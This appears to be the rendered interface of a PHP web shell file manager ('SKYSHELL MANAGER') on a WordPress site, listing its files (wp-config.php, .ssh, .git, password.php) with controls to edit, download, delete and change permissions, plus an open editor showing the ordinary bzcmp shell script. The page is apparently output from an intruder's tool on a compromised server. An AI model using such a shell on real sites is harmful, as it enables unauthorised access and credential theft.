📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
sites
/
otvetkak.ru
/
Name
Size
Permissions
Actions
📁
antibot
-
0700
🗑️
🔒
📁
tmp
-
0700
🗑️
🔒
📁
..
-
0755
🗑️
🔒
📁
wp-admin
-
0700
🗑️
🔒
📁
media
-
0700
🗑️
🔒
📁
lnkr
-
0700
🗑️
🔒
📁
lib
-
0700
🗑️
🔒
📁
landing
-
0700
🗑️
🔒
📁
image
-
0700
🗑️
🔒
📁
wp-content
-
0700
🗑️
🔒
📁
banners
-
0700
🗑️
🔒
📁
wp-includes
-
0700
🗑️
🔒
📁
ajax
-
0700
🗑️
🔒
📁
.cache
-
0700
🗑️
🔒
📁
.git
-
0700
🗑️
🔒
📁
.ssh
-
0700
🗑️
🔒
📄
wp-config.php
5.48 KB
0600
🗑️
⬇️
✏️
🔒
📄
sitemap.xml
1.75 KB
0700
🗑️
⬇️
✏️
🔒
📄
test_seowork.php
0.15 KB
0700
🗑️
⬇️
✏️
🔒
📄
wmail_09c465d87d3c161979df26f9829ccd42.html
0.16 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-trackback.php
4.77 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-signup.php
33.54 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-settings.php
24.41 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-mail.php
8.34 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-register.php
0.33 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-rdf.php
0.22 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-pass.php
0.4 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-cron.php
5.41 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-feed.php
0.24 KB
0700
🗑️
⬇️
✏️
🔒
📄
robots.txt
0.5 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.44 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-login.php
48.17 KB
0700
🗑️
⬇️
✏️
🔒
📄
wp-login.php_
28.4 KB
0700
🗑️
⬇️
✏️
🔒
📄
service-worker.js
0.06 KB
0700
🗑️
⬇️
✏️
🔒
📄
post-sitemap1.xml
257.69 KB
0700
🗑️
⬇️
✏️
🔒
📄
post-sitemap7.xml
13.24 KB
0700
🗑️
⬇️
✏️
🔒
📄
go.php
0.95 KB
0700
🗑️
⬇️
✏️
🔒
📄
.gitignore
1.45 KB
0700
🗑️
⬇️
✏️
🔒
📄
.htaccess
0.19 KB
0644
🗑️
⬇️
✏️
🔒
📄
506da8d1a8ff.html
0 KB
0700
🗑️
⬇️
✏️
🔒
📄
50x.html
1.38 KB
0700
🗑️
⬇️
✏️
🔒
📄
addl-sitemap.xml
0.58 KB
0700
🗑️
⬇️
✏️
🔒
📄
ads.txt
3.67 KB
0700
🗑️
⬇️
✏️
🔒
📄
agreement.php
6.55 KB
0700
🗑️
⬇️
✏️
🔒
📄
category-sitemap.xml
16.45 KB
0700
🗑️
⬇️
✏️
🔒
📄
f4539d9a1d2dddd90b094a1fb2744cbd.html
0.01 KB
0700
🗑️
⬇️
✏️
🔒
📄
fdc43c7197b903c03ce97888.html
0 KB
0700
🗑️
⬇️
✏️
🔒
📄
google11d97dcef8eaeca0.html
0.05 KB
0700
🗑️
⬇️
✏️
🔒
📄
post-sitemap6.xml
261.13 KB
0700
🗑️
⬇️
✏️
🔒
📄
google670877162ab878dc.html
0.05 KB
0700
🗑️
⬇️
✏️
🔒
📄
googlecf81da77e01ae41c.html
0.05 KB
0700
🗑️
⬇️
✏️
🔒
📄
live-116cb0fc.txt
0.02 KB
0700
🗑️
⬇️
✏️
🔒
📄
page-sitemap.xml
11.42 KB
0700
🗑️
⬇️
✏️
🔒
📄
password.php
0.85 KB
0700
🗑️
⬇️
✏️
🔒
📄
post-sitemap.xml
1556.63 KB
0700
🗑️
⬇️
✏️
🔒
📄
post-sitemap2.xml
259.91 KB
0700
🗑️
⬇️
✏️
🔒
📄
post-sitemap3.xml
258.74 KB
0700
🗑️
⬇️
✏️
🔒
📄
post-sitemap4.xml
258.07 KB
0700
🗑️
⬇️
✏️
🔒
📄
post-sitemap5.xml
250.93 KB
0700
🗑️
⬇️
✏️
🔒
📄
yandex_571a37b60f6c38fe.html
0.16 KB
0700
🗑️
⬇️
✏️
🔒
Editing: bzcmp
#!/bin/sh # sh is buggy on RS/6000 AIX 3.2. Replace above line with #!/bin/ksh # Bzcmp/diff wrapped for bzip2, # adapted from zdiff by Philippe Troin <phil@fifi.org> for Debian GNU/Linux. # Bzcmp and bzdiff are used to invoke the cmp or the diff pro- # gram on compressed files. All options specified are passed # directly to cmp or diff. If only 1 file is specified, then # the files compared are file1 and an uncompressed file1.gz. # If two files are specified, then they are uncompressed (if # necessary) and fed to cmp or diff. The exit status from cmp # or diff is preserved. PATH="/usr/bin:/bin:$PATH"; export PATH prog=`echo $0 | sed 's|.*/||'` case "$prog" in *cmp) comp=${CMP-cmp} ;; *) comp=${DIFF-diff} ;; esac OPTIONS= FILES= for ARG do case "$ARG" in -*) if test -z "$OPTIONS"; then OPTIONS="$ARG" else OPTIONS="$OPTIONS $ARG" fi ;; *) if test -f "$ARG"; then FILES="$FILES $ARG" else echo "${prog}: $ARG not found or not a regular file" exit 1 fi ;; esac done if test -z "$FILES"; then echo "Usage: $prog [${comp}_options] file [file]" exit 1 fi set $FILES if test $# -eq 1; then FILE=`echo "$1" | sed 's/.bz2$//'` bzip2 -cd "$FILE.bz2" | $comp $OPTIONS - "$FILE" STAT="$?" elif test $# -eq 2; then case "$1" in *.bz2) case "$2" in *.bz2) F=`echo "$2" | sed 's|.*/||;s|.bz2$||'` tmp=`mktemp "${TMPDIR:-/tmp}"/bzdiff.XXXXXXXXXX` || { echo 'cannot create a temporary file' >&2 exit 1 } bzip2 -cdfq "$2" > "$tmp" bzip2 -cdfq "$1" | $comp $OPTIONS - "$tmp" STAT="$?" /bin/rm -f "$tmp";; *) bzip2 -cdfq "$1" | $comp $OPTIONS - "$2" STAT="$?";; esac;; *) case "$2" in *.bz2) bzip2 -cdfq "$2" | $comp $OPTIONS "$1" - STAT="$?";; *) $comp $OPTIONS "$1" "$2" STAT="$?";; esac;; esac else echo "Usage: $prog [${comp}_options] file [file]" exit 1 fi exit "$STAT"
💾 Save Changes